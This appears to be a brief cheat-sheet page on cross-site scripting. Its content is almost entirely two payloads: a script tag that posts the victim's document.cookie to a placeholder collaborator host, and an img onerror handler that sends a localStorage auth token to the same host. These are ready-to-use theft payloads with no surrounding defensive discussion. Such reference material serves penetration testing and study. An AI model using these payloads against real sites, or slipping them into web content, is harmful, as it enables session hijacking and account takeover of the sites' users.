XSS
Description
Payloads
<script>
fetch('https://COLLAB', {
method:'POST',
mode:'no-cors',
body:document.cookie
});
</script><img src=x onerror="
fetch('https://COLLAB/?token=' +
encodeURIComponent(localStorage.getItem('token') || 'null'),
{ mode: 'no-cors' });
">Last updated